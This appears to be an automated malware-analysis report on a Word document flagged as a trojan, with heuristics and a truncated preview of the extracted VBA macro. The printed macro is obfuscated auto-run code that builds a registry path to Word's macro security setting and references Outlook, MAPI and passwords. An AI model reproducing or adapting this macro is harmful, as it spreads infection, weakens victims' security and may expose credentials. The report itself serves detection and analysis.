Verdict: MALICIOUS
Risk Score: 262

Malware Insights

MITRE ATT&CK: T1059.005 Visual Basic; T1204.002 Malicious File
The sample is a Microsoft Word document containing a VBA macro that runs automatically when the document is opened (Document_Open). The macro uses the Shell() function and CreateObject, indicating an attempt to execute external code. The ClamAV detection 'Doc.Trojan.Werwe-1' further supports its malicious nature. While the specific payload is not directly visible, the macro's functionality strongly suggests it is designed to download and execute a second-stage payload.
Heuristics (7)

- ClamAV: Doc.Trojan.Werwe-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Werwe-1
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL labels record which channel (macro, JS, link annotation, document body, ...) reached each URL. Every URL extracted from this sample was labelled "In document text (OLE body)".
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 104410 bytes |

SHA-256: 6f566026237ef62da406e6a4f64f80da6cbf7b803916278ba61e67c7e7a88f53

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "x"
Attribute VB_Base = "1Normal.x"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
sec$ = _
"Second"
p_e = Minute(bb1)
'
b_epppppppppb = Minute(bb1)
dd1$ = _
"doc"
' 17.32991
n__fbbbbbbbbbn = Month(bb1)
ee1$ = _
"exe"
w___gnnnnnnnnw = Second(bb1)
c___gwwwwwwwwwwwc = Second(bb1)
y___gcccccccccy = Second(bb1)
ff1$ = _
"com"
' a
gg1$ = _
"sys"
' askl
x____hyyyyyyyyyyyyx = Day(bb1)
v____hxxxxxxxxxxv = Day(bb1)
ii1$ = _
"bat"
q___gvvvvvvvvvq = Second(bb1)
m___gqqqqqqqqqqqqm = Second(bb1)
i___gmmmmmmmmmmmmmi = Second(bb1)
'
u_____iiiiiiiiiiiiu = Hour(bb1)
'
' a
r_____iuuuuuuuuuuuur = Hour(bb1)
' a
a_____irrrrrrrrrra = Hour(bb1)
'
k__faaaaaaaak = Month(bb1)
' a
'
h___gkkkkkkkkkkh = Second(bb1)
u___ghhhhhhhhhhhhhu = Second(bb1)
'
y___guuuuuuuuuuuy = Second(bb1)
'
r____hyyyyyyyyyr = Day(bb1)
a____hrrrrrrrrra = Day(bb1)
m____haaaaaaaaaaam = Day(bb1)
a$ = _
""
' a
' askl
h_____immmmmmmmmmmmh = Hour(bb1)
cur$ = _
"_CURRENT"
q___ghhhhhhhhhhhhhq = Second(bb1)
j___gqqqqqqqqqqj = Second(bb1)
hk1$ = _
"HKEY" + _
cur$ + "_USER"
' a
i__fjjjjjjjjjji = Month(bb1)
sec1$ = _
"Security"
x_____iiiiiiiiiiiiix = Hour(bb1)
mm1$ = _
"\"
a____hxxxxxxxxxxxxxxa = Day(bb1)
' a
smo$ = _
mm1$ + "Software" + mm1$ + "Microsoft" + mm1$ + "Office"
x____haaaaaaaaaaaaax = Day(bb1)
c____hxxxxxxxxxc = Day(bb1)
' a
' Microsoft Word
cc1$ = _
Chr$(46)
v_ecccccccccv = Minute(bb1)
b$ = _
hk1$ + _
smo$ + mm1$ + "9" + cc1$ + "0" + mm1$ + "Word" + mm1$ + sec1$
' 81.1579
c$ = _
"Level"
b__fvvvvvvvvb = Month(bb1)
d$ = _
sec1$ + cc1$ + cc1$ + cc1$
t_ebbbbbbbbt = Minute(bb1)
e$ = _
"Macro"
r___gttttttttttr = Second(bb1)
c___grrrrrrrrrrc = Second(bb1)
g$ = _
"Tools"
g_____icccccccccccg = Hour(bb1)
' askl
ot1$ = _
"Outlook"
' askl
h$ = _
ot1$ + _
cc1$ + _
"Application"
v__fggggggggv = Month(bb1)
k$ = _
hk1$ + _
smo$ + _
mm1$
o___gvvvvvvvvvvvvvo = Second(bb1)
' 64.52216
nam$ = _
"x"
' a
z__foooooooooooz = Month(bb1)
i$ = _
nam$ + _
"?"
d_____izzzzzzzzzzzzzd = Hour(bb1)
h_____iddddddddddddddh = Hour(bb1)
f_____ihhhhhhhhhhhhhhf = Hour(bb1)
q_____ifffffffffffffq = Hour(bb1)
aut$ = _
"y"
' askl
j$ = _
"MAPI"
' askl
l$ = _
"profile"
' a
m$ = _
"password"
w_eqqqqqqqw = Minute(bb1)
n1$ = _
"Datos de:"
' Microsoft Word
b__f
... (truncated)